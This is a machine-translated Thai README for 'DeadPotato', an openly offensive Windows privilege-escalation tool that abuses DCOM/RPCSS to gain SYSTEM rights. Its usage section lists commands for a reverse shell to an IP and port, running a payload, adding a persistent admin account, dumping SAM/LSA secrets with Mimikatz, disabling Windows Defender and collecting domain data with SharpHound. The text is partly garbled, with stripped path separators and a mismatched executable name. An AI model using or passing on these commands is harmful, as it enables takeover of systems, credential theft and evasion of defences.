มันฝรั่งที่ตายแล้ว

ซอร์สโค้ดอื่น ๆ

ดาวน์โหลด

QQ浏览器截图20241111131452.png

โมดูล Hashdump และ SharpHound วางจำหน่ายแล้ว!

❗ การใช้โปรแกรมนี้ภายใต้บริบทที่ไม่ได้รับอนุญาตถือเป็นสิ่งต้องห้ามโดยเด็ดขาด ผู้เขียน DeadPotato จะไม่รับผิดชอบต่ออันตรายใดๆ ที่เกิดขึ้นกับระบบ ใช้ด้วยความระมัดระวัง

C:Userslypd0> GodPotato.exe
  
    ⠀⢀⣠⣤⣤⣄⡀⠀    _           _
    ⣴⣿⣿⣿⣿⣿⣿⣦   |  _  _  _||_) _ _|_ _ _|_ _
    ⣿⣿⣿⣿⣿⣿⣿⣿   |_/(/_(_|(_||  (_) |_(_| |_(_)
    ⣇⠈⠉⡿⢿⠉⠁⢸   Open Source @ github.com/lypd0
    ⠙⠛⢻⣷⣾⡟⠛⠋         -= Version: 1.2 =-
        ⠈⠁⠀⠀⠀

_,.-'~'-.,__,.-'~'-.,__,.-'~'-.,__,.-'~'-.,__,.-'~'-.,_

 (*) Example Usage(s):

   -={ deadpotato.exe -MODULE [ARGUMENTS] }=-

   -> deadpotato.exe -cmd "whoami"
   -> deadpotato.exe -rev 192.168.10.30:9001
   -> deadpotato.exe -exe paylod.exe
   -> deadpotato.exe -newadmin lypd0:DeadPotatoRocks1
   -> deadpotato.exe -shell
   -> deadpotato.exe -mimi sam
   -> deadpotato.exe -defender off
   -> deadpotato.exe -sharphound

 (*) Available Modules:

   - cmd: Execute a command as NT AUTHORITYSYSTEM.
   - rev: Attempts to establish a reverse shell connection to the provided host
   - exe: Execute a program with NT AUTHORITYSYSTEM privileges (Does not support interactivity).
   - newadmin: Create a new administrator user on the local system.
   - shell: Manages to achieve a semi-interactive shell (NOTE: Very bad OpSec!)
   - mimi: Attempts to dump SAM/LSA/SECRETS with Mimikatz. (NOTE: This will write mimikatz to disk!)
   - defender: Either enables or disables Windows Defender's real-time protection.
   - sharphound: Attempts to collect domain data for BloodHound.

เริ่มต้นอย่างรวดเร็ว - วิธีใช้งาน

สิทธิ์ SeImpersonatePrivilege ถูกเปิดใช้งานในบริบทของคุณหรือไม่ ด้วย DeadPotato คุณสามารถรับสิทธิพิเศษสูงสุดบนระบบโลคัลได้

เครื่องมือนี้จะพยายามเริ่มกระบวนการยกระดับที่ทำงานในบริบทของผู้ใช้ NT AUTHORITYSYSTEM โดยการใช้ข้อบกพร่อง RPCSS ของ DCOM ในการจัดการ OXIDs ในทางที่ผิด ซึ่งช่วยให้สามารถเข้าถึงเครื่องได้อย่างไม่จำกัดสำหรับการดำเนินการที่สำคัญที่จะดำเนินการได้อย่างอิสระ

ในกรณีต่อไปนี้ จะใช้โมดูล -cmd มีโมดูลมากมายให้ใช้งาน เช่น -rev IP:PORT สำหรับการวางไข่แบบย้อนกลับที่มีการยกระดับ -newadmin usr:pass สำหรับการสร้างผู้ใช้ผู้ดูแลระบบภายในเครื่องใหม่เพื่อความคงอยู่ หรือ -mimi sam สำหรับการทิ้งแฮช SAM

ตรวจสอบสิทธิ์ SeImpersonatePrivilege

ในการใช้ DeadPotato จะต้องเปิดใช้งานสิทธิ์ SeImpersonatePrivilege ในบริบทปัจจุบัน เพื่อตรวจสอบสิ่งนี้ สามารถใช้คำสั่ง whoami /priv ได้ หากมีการปิดใช้งานสิทธิ์ การใช้ประโยชน์จะไม่สามารถทำได้ในบริบทปัจจุบัน

C:Userslypd0> whoami /priv

<...SNIP...>
SeImpersonatePrivilege    Impersonate a client after authentication     Enabled
<...SNIP...>

รับ Reverse Shell ที่ยกระดับ

เครดิต

โปรเจ็กต์ "DeadPotato" นี้เป็นเครื่องมือที่สร้างขึ้นจากซอร์สโค้ดของผลงานชิ้นเอก "GodPotato" โดย BeichenDream หากคุณชอบโปรเจ็กต์นี้ อย่าลืมไปแสดงการสนับสนุนโปรเจ็กต์ดั้งเดิมด้วย

BeichenDream, Benjamin DELPY gentilkiwi นักพัฒนา BloodHound